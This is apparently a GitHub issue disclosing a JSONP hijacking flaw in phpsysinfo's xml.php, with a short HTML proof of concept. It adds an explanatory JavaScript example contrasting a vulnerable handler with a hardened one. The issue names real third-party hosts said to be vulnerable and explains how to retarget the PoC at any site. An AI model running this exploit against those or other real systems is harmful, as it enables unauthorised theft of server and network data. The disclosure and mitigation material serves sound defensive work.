Hebing123 / cve


XML.php JSONP hijacking in phpsysinfo v3.4.3 #5

Open Hebing123 opened 11 months ago

Hebing123 commented 11 months ago

Description

phpsysinfo v3.4.3 has a JSONP vulnerability. The XML.php file has a JSONP hijacking vulnerability. When a user visits a page carefully crafted by the attacker, the JSON data is obtained and sent to the attacker.

Proof of Concept

We created an HTML file as a proof of concept to showcase the vulnerability. This HTML file will attempt to retrieve the JSON data from https://phpbb.trabitechnik.com/xml.php and display it in a pop-up window.

Of course, in a real-world attack, an attacker would simply use a PHP file to send the retrieved JSON data to their server using an XMLHttpRequest.

Here is the HTML code for the proof of concept file:

<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8">
    <title></title>
    <script src="http://apps.bdimg.com/libs/jquery/1.10.2/jquery.min.js"></script>
  </head>
  <body>
    <script>
      function dezsbrxdio(data){ alert(JSON.stringify(data)); }
    </script>
    <script src="https://phpbb.trabitechnik.com/xml.php?json&callback=dezsbrxdio&jsonp=dezsbrxdio&cb=dezsbrxdio&json=dezsbrxdio">
    </script>
  </body>
</html>

Here are some online assets using phpsysinfo that I have found: https://server.wxp-3.nl/xml.php https://sysinfo.pouserinet.fi/xml.php https://zvoyc1uy16u7hu9e.myfritz.net/xml.php http://204.11.55.179/xml.php http://204.11.55.87/xml.php http://88.67.242.79/xml.php http://217.131.251.40/xml.php

If we want to easily test whether a website is vulnerable to this exploit, we can simply replace "phpbb.trabitechnik.com" in the HTML file (POC) with the URL of the website we want to test. We can open the modified HTML file and check if a pop-up window is displayed with the JSON data retrieved from the website. If a pop-up window appears with the JSON data, then the website is vulnerable to the JSONP hijacking exploit.

Impact

If a website's internal network information or other sensitive data is exposed through JSONP and vulnerable to hijacking, the consequences could be severe.

An attacker could potentially retrieve sensitive information such as IP addresses, server names, network topologies, and other data that could be used to map out the internal network structure. This information could then be used to identify additional targets within the network and launch more targeted attacks.

In addition, if the website is part of a larger system or network, the attacker could use the information obtained through JSONP hijacking to gain access to other systems or sensitive data within the network.

Overall, the potential consequences of JSONP hijacking are significant and can lead to a range of security issues and data breaches. It is important for website administrators to ensure that their systems are not vulnerable to this exploit and to take appropriate measures to mitigate the risk.
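The following is an added example written for this page, not code from the report above, from phpsysinfo, or from the fix commit (whose contents are not shown here). It models the server side of the pattern the report describes: an endpoint that wraps its JSON in whatever callback name the query string supplies can be loaded cross-site via a `<script>` tag, with the victim's cookies attached, so any page can read the data. The hardened handler beside it shows the mitigations a maintainer would want: serve plain JSON by default, only honour a callback when JSONP is explicitly enabled and the browser reports a same-origin request via `Sec-Fetch-Site` (failing closed when the header is missing), restrict the callback to a safe identifier, and send `nosniff` headers. The sample data, the `allowJsonp` config flag and the handler signatures are constructed for the example.

```javascript
// Constructed sample payload standing in for the host/network details a
// system-information endpoint might return.
const SENSITIVE = { hostname: "example-host", ip: "10.0.0.5" };

// Only plain JavaScript identifiers are accepted as callback names; this
// prevents the callback parameter from injecting arbitrary script text.
const CALLBACK_RE = /^[A-Za-z_$][\w$]{0,63}$/;

// Vulnerable pattern: any of several callback parameters is echoed verbatim
// around the JSON. A cross-site <script src="...?callback=fn"> receives the
// data as a call to fn() in the attacker's page, with the victim's cookies sent.
function vulnerableHandler(query) {
  const cb = query.callback || query.jsonp || query.cb;
  const body = JSON.stringify(SENSITIVE);
  if (cb) {
    return {
      status: 200,
      headers: { "Content-Type": "application/javascript" },
      body: `${cb}(${body});`,
    };
  }
  return { status: 200, headers: { "Content-Type": "application/json" }, body };
}

// Hardened handler. `headers` is the incoming request header map (lower-case
// names); `config.allowJsonp` is a hypothetical opt-in flag, off by default.
function hardenedHandler(query, headers, config = { allowJsonp: false }) {
  const body = JSON.stringify(SENSITIVE);
  const baseHeaders = {
    "Content-Type": "application/json; charset=utf-8",
    "X-Content-Type-Options": "nosniff",
    "Cache-Control": "no-store",
  };
  const cb = query.callback || query.jsonp || query.cb;

  // Default: plain JSON. A cross-site <script> tag cannot read a JSON body,
  // and fetch/XHR from another origin would need CORS, which is never granted.
  if (!cb || !config.allowJsonp) {
    return { status: 200, headers: baseHeaders, body };
  }

  // JSONP was explicitly enabled: still refuse cross-site script loads.
  // Modern browsers send Sec-Fetch-Site on every request; a missing header
  // (old client or non-browser tool) is treated as untrusted, i.e. fail closed.
  const site = (headers["sec-fetch-site"] || "").toLowerCase();
  if (site !== "same-origin" && site !== "none") {
    return {
      status: 403,
      headers: baseHeaders,
      body: JSON.stringify({ error: "JSONP is only served to same-origin requests" }),
    };
  }

  if (!CALLBACK_RE.test(cb)) {
    return {
      status: 400,
      headers: baseHeaders,
      body: JSON.stringify({ error: "invalid callback name" }),
    };
  }

  // The leading /**/ comment defeats content-type sniffing tricks that try to
  // interpret the response as something other than script.
  return {
    status: 200,
    headers: { ...baseHeaders, "Content-Type": "application/javascript; charset=utf-8" },
    body: `/**/ ${cb}(${body});`,
  };
}

// Stand-alone demo: the same cross-site request against both handlers.
const crossSiteQuery = { json: "", callback: "dezsbrxdio" };
const crossSiteHeaders = { "sec-fetch-site": "cross-site" };
console.log("vulnerable:", vulnerableHandler(crossSiteQuery).body);
console.log("hardened  :", hardenedHandler(crossSiteQuery, crossSiteHeaders, { allowJsonp: true }).status);
```

The decisive control is the first branch: if the endpoint never wraps sensitive data in a caller-chosen function, there is nothing for a third-party page to hijack. The `Sec-Fetch-Site` check and the callback allowlist only matter for deployments that deliberately keep JSONP for same-origin widgets.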

benharvie marked this as fixed in 4f2cee505e4f2e9b369a321063ff2c5e0c34ba45 with commit 4f2cee 4 months ago

Hebing123 commented 10 months ago

This is the vulnerability exploitation reference for CVE-2023-49006.